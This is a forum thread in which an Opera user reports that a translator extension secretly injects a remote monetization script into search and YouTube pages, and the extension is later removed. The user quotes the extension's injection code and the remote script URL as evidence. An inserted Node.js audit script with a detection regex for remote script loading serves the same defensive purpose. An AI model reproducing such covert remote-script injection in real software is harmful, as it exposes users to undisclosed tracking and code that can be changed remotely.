
Report extension

  • I found an extension that secretly collects info about my internet usage (site navigation, etc) and serves that to a third party to monetize the extension. It was actually worse, as some versions before, it used to hijack the google ads on the google webpage to display their own ads, and replaced some of the results on the search with those ads, but I think that was too aggressive and was removed on later versions. That behavior is not disclosed anywhere on the extension page, and I only noticed that because my antivirus accused it, and because of the whole google ads thing.

    Is that behavior allowed on extensions? If it is, I think it should be disclosed somewhere on the extension page because the extension that I'm talking about is one that translates the page using the google translator (https://addons.opera.com/en/extensions/details/translator/) and has more than 3.000.000 downloads, so it's very popular.

    Aside from that, I couldn't find a way to report the extension anywhere, and I'm losing my trust in Opera extensions because of those security reasons. Imagine now that more than 3.000.000 users are, without knowing, giving possibly sensitive data to third-party companies to do whatever they want with it, and to make it worse, I simply can't find anywhere a way to report that extension.

    Is there a way to/should I report it?

  • In the extension's permissions, it's said that your navigation data can be used. And the description of the extension also says that third-party translation services are used.

  • @leocg Translation services are different from tracking/monetization services, which is my initial complaint.

    He uses http://monetizus.com/solutions.php, which is a third party service for monetization. Looking through the extension source code, you can see on the file "includes/user_js.js", line 658 that if the URL contains one of the following words, it injects the monetizus script: bing, google, yandex, baidu, search, yahoo, duckduckgo, qwant, nova, rambler, youtube.

    But, if I understood correctly from your message, do you allow me to create a new extension that allows you to translate text on any website, but secretly steals your passwords from facebook, google, etc? Because that's what I'm understanding from your "it's said that your navigation data can be used" sentence. If that's the case, then I'm going back to chrome, thanks! At least they have a good policy with their extensions (and easily allow us to report them). I thought that a big company like Opera would value the security of its users more...

    It's understandable that people making extensions should have a way to monetize their content, but it should be done in a way that doesn't risk my personal data.

  • https://dev.opera.com/extensions/publishing-guidelines/#acceptance-criteria

    There you will find the criteria for an extension to be accepted. Of course stealing passwords is not allowed.

    And Opera is probably the browser that takes users' security most into consideration, making some of them even complain about the excess of security sometimes.

  • @leocg said in Report extension:

    And Opera is probably the browser that takes users' security most into consideration, making some of them even complain about the excess of security sometimes.

    If that is really the case, you should probably have an easy way to report extensions that don't behave, right? And from the impression you are giving me, it doesn't really sound like your statement is true, seeing that from the link you posted, at least 5 criteria were broken, and still you are treating me with disbelief 🤦♂

    It must not collect private information without authorization from the user.

    The extension does not ask for consent in any way and still loads monetizus, which, as I said earlier, is a monetization service included in the extension. From the service webpage, here are some of those features, which track the user:

    • In-image: Monetize the most viewed and beloved content. Monetizus solution parses images by pixel to determine what’s in every image and drive relevant promotional materials to your audience.
    • Price Suggestor: [...] Fast and relevant search through the tons of products collects and drives the fairest results with the cheapest prices, depending on your user's activity.
    • Interstitial: [...] Monetize the time, users spend on the website with Monetizus.

    And, well, it is a monetization service, so there's probably more tracking under the hood...

    It must not change referral parameters, interfere with Opera monetization mechanisms or otherwise misappropriate traffic or revenues from other sources.

    It could misappropriate traffic or revenues from other sources using some of the features of the same service mentioned above. All of the services provided by Monetizus go against this topic, and you can check them here. I'm not saying that the extension uses all of them, but the script that is loaded by the extension definitely has all those capabilities, and it is up to the Monetizus service to decide whether or not they will apply those services.

    No external JavaScript is allowed. All JavaScript code must be contained in the extension. External APIs are ok.

    As I said in the first post, the extension has the following code on the includes/user_js.js file:

    // Only on search-engine / video-site pages: inject the remotely hosted monetizus script
    if (window.location.href.match(/[a-z]+:\/\/(www\.)?(bing|google|yandex|baidu|search\.yahoo|duckduckgo|qwant|nova\.rambler|youtube)\.[a-z]+(\/|$)/i))
    {
        console.log("demo mode: include monetizus plugin.");
        var monetizer_script = document.createElement("SCRIPT");
        // Protocol-relative URL: the script is fetched from the remote server on every page load
        monetizer_script.src = "//s3.amazonaws.com/cashe-js/1c31e14cd0e143b215.js";
        var firstScript = document.getElementsByTagName("SCRIPT")[0];
        firstScript.parentNode.insertBefore(monetizer_script, firstScript);
    }

    I don't know if you understand this code, but it is essentially inserting the script s3.amazonaws.com/cashe-js/1c31e14cd0e143b215.js if the URL contains one of the following words: bing, google, yandex, baidu, search, yahoo, duckduckgo, qwant, nova, rambler, youtube. The code is delivered through an online address, so if monetizus decides to change the content of this script to do exactly what I said in the last post (secretly steal your passwords from facebook, google, etc), they could easily do it at any time, and you wouldn't even notice... I should probably state too that the URL s3.amazonaws.com/cashe-js/1c31e14cd0e143b215.js is reported by my antivirus (Kaspersky) as a dangerous URL.

    Ads in content scripts are not allowed.

    As I said, the monetizus script is loaded on the includes/user_js.js file, and as you can see on the manifest, it is included on the content_scripts section:

    "content_scripts": [ {
        "all_frames": true,
        "js": [ "includes/user_js.js" ],
        "matches": [ "*://*/*" ],
        "run_at": "document_end"
    } ],

    While linking to your own or other sites from your extension is fine, such links should be relevant and have a clear function. Don’t overload the extension with promotional links.

    A monetization/tracking service is definitely not relevant to the user of the extension, especially when being secretly bundled with a translating extension.

    So, again, can you please stop treating me with disbelief and offer some help? That is really annoying, as I'm trying to report a security issue to make Opera better, and those actions only discourage people from doing it...
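Added here as an example (not code from the post, the extension or Opera): a small Node.js audit that checks an unpacked extension for the two issues the post raises, a content script matching every site and a JS file that assigns a remote URL to a script's src. The manifest and file contents below are constructed samples with a placeholder host, not the real script URL.

```javascript
// Added example (not the post's, the extension's or Opera's code): static audit for the
// two acceptance-criteria problems raised above: content scripts that run on every site,
// and JS files that assign a remote URL to a script's .src ("No external JavaScript").
// Assumes the extension is unpacked and its manifest and JS files were read into strings.

// `.src = "<url>"` with an absolute (http/https) or protocol-relative ("//host/...") URL,
// i.e. code fetched from a server at runtime rather than shipped inside the extension.
const REMOTE_SRC_RE = /\.src\s*=\s*(["'`])((?:https?:)?\/\/[^"'`]+)\1/g;

// One entry per content-script match pattern that covers all sites.
function contentScriptsOnAllSites(manifest) {
  const out = [];
  for (const entry of manifest.content_scripts || []) {
    for (const pattern of entry.matches || []) {
      if (pattern === "<all_urls>" || /^\*:\/\/\*\/\*$/.test(pattern)) {
        out.push({ pattern, js: entry.js || [], allFrames: !!entry.all_frames });
      }
    }
  }
  return out;
}

// Every remote URL a JS file assigns to a script element's .src.
function remoteScriptSources(jsSource) {
  return Array.from(jsSource.matchAll(REMOTE_SRC_RE), (m) => m[2]);
}

// files maps an extension-relative path to that file's contents.
function auditExtension(manifest, files) {
  const findings = [];
  for (const cs of contentScriptsOnAllSites(manifest)) {
    const frames = cs.allFrames ? ", all frames" : "";
    findings.push(`content script runs on all sites (${cs.pattern}${frames}): ${cs.js.join(", ")}`);
    for (const path of cs.js) {
      for (const url of remoteScriptSources(files[path] || "")) {
        findings.push(`${path} injects an external script at runtime: ${url}`);
      }
    }
  }
  return findings;
}

// Constructed sample modelled on the manifest and snippet quoted above (placeholder host).
const SAMPLE_MANIFEST = {
  content_scripts: [{ all_frames: true, js: ["includes/user_js.js"], matches: ["*://*/*"], run_at: "document_end" }],
};
const SAMPLE_FILES = { "includes/user_js.js": 'var s = document.createElement("SCRIPT");\ns.src = "//cdn.example.invalid/monetizer.js";\n' };

for (const f of auditExtension(SAMPLE_MANIFEST, SAMPLE_FILES)) console.log(f);
```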

  • Maybe someday they will have a better system to report extensions. For now, I guess you can use this forum.

  • @leocg So, how can I proceed?

  • I guess you already did what you can do by opening this topic.

  • @leocg Well, can't you do something about it? Or at least pass that to someone who can?

  • I will see if I can do something.

  • @leocg Thanks! Keep me updated, please!

  • The extension seems to be removed.

  • @leocg Nice! Thanks!

    I just wish this whole process could be less tiresome and time-consuming on my end, you know, because I'm not the only one who should be looking for security issues like that, and with all the trouble I had to go through just to make a simple and obvious report, I think it just discourages people from doing the same.

    I don't know how and when Opera checks for issues on extensions that are submitted or updated, but I expected that at least the acceptance criteria would be thoroughly checked, which, as I see with that extension, was not the case at all. This issue gets amplified seeing the reach of that extension, which is in the top 10 recommended extensions and is the first one in the translation category. How does an extension like this get recommended by your team?

    Along with that, an easier way to report an extension, which would not require me to dissect the extension source code and your acceptance criteria to look for issues would definitely be great...

  • Next time you can use https://security.opera.com/report-security-issue/

    Choose "web services" and then addons.opera.com.